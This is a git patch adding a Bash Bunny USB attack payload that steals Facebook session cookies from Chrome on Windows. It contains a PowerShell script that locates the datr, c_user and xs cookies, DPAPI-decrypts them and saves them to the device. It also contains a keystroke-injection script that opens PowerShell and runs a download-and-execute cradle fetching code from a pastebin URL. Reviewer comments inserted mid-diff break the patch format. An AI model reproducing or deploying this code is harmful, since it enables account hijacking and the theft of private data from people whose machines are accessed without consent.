From 1ecaddbf55c68a1608b4a6919515a63957843cdc Mon Sep 17 00:00:00 2001
From: oXis
Date: Fri, 17 Mar 2017 19:59:11 +0000
Subject: [PATCH] add WindowsCookies payload
---
 payloads/library/WindowsCookies/README.md | 18 +++++
 .../WindowsCookies/get_facebook_cookies.ps1 | 65 +++++++++++++++++++
 payloads/library/WindowsCookies/payload.txt | 48 ++++++++++++++
 3 files changed, 131 insertions(+)
 create mode 100644 payloads/library/WindowsCookies/README.md
 create mode 100644 payloads/library/WindowsCookies/get_facebook_cookies.ps1
 create mode 100644 payloads/library/WindowsCookies/payload.txt
diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md
new file mode 100644
index 00000000..ed037be7
--- /dev/null
+++ b/payloads/library/WindowsCookies/README.md
@@ -0,0 +1,18 @@
+# WindowsCookies for Bash Bunnys
+
+Author: oXis
+Version: Version 1.0
+Credit: illwill, sekirkity, EmpireProject
+
+## Description
+
+Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession
+Only works for Chrome on Windows. Tested on two different Windows 10 machines.
+Only payload.txt is required, powershell script is here only if you want to modify it.
+
+## Payload LED STATUS
+
+| LED | Status |
+| ---------------- | -------------------------------------- |
+| Blue (blinking) | Payload init |
+| Purple (blinking)| Done |
diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1
new file mode 100644
index 00000000..8233e8b6
--- /dev/null
+++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1
@@ -0,0 +1,65 @@
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+ "datr is $DecPwd"
+
+ # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # 
[System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+ "c_user is $DecPwd"
+
+ # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+ "xs is $DecPwd"
+}
+
+Get-FacebookCreds
\ No newline at end of file
diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt
new file mode 100644
index 00000000..0e0a7281
--- /dev/null
+++ b/payloads/library/WindowsCookies/payload.txt
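Review bot: The header comments do not describe this file: `# Instructions: import the module, then perform the commanded needed.` is garbled and contradicted by the unconditional `Get-FacebookCreds` call on the last line, and `# Use: Get-FacebookCreds [path to Login Data]` names the wrong database, since the default `$Path` and all three regexes target the `Cookies` file. The header should state what the body visibly does: the Cookies file is read as Latin-1 text, the facebook.com datr, c_user and xs records are located by regex, their values are DPAPI-decrypted with `DataProtectionScope.CurrentUser`, and the decrypted values are emitted in plain text on the pipeline. The `$PwdRegex`/`$Pwd`/`$DecPwd` names are carried over from the password-extraction script this was derived from and no longer match the data; `$CookieRegex`/`$CookieBlob`/`$CookieValue` would read correctly. The three near-identical blocks also repeat the misleading comment `# First the magic bytes for the facebook string`, which describes the first block only.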
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title: Facebook session cookies dump
+# Author: oXis (inspired by illwill)
+# Version: 1.0
+#
+# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
+# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName%
+# Credits to these guys for their powershell scripts:
+# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
+# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
+# Also credit to illwill for the BrowerCreds payload
+
+#script
+ # Blue...............Running Script
+ # Purple.............Got Browser Creds
+
+ # QUACK SET_LANGUAGE gb
+#DUCKY_LANG='fr'
+
+LED R 200
+LOOTDIR=/root/udisk/loot/FacebookSession
+mkdir -p $LOOTDIR
+
+ATTACKMODE HID STORAGE
+LED B 200
+
+# wait 6 seconds for the storage to popup
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 500
+Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+
+#Dump Chrome Creds
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt
+Q ENTER
+Q DELAY 100
+Q STRING exit
+Q ENTER
+Q DELAY 2000
+
+sync
+LED R B 200
\ No newline at end of file
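Review bot: The code that runs on the target is not the file committed in this change: the `Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)...` line fetches a script over plain HTTP from a paste site at run time with no integrity check, and the bundled get_facebook_cookies.ps1 is never referenced by the payload. Whoever controls that paste or the network path can substitute arbitrary PowerShell, which the payload then executes with the logged-in user's privileges, and a reviewer of this repository has no way to tell whether the paste still matches the committed script. At minimum the header should state that dependency, e.g. `# NOTE: the PowerShell executed is fetched from http://pastebin.com/raw/25Z8peMb at run time; get_facebook_cookies.ps1 is a reference copy and is not what runs`, and the README's `Only payload.txt is required` should say the same. The header should also state that the decrypted session values are appended in plain text to `\loot\FacebookSession\<computername>.txt` on the storage partition, since the `Out-File -Append` line is the only place that is visible.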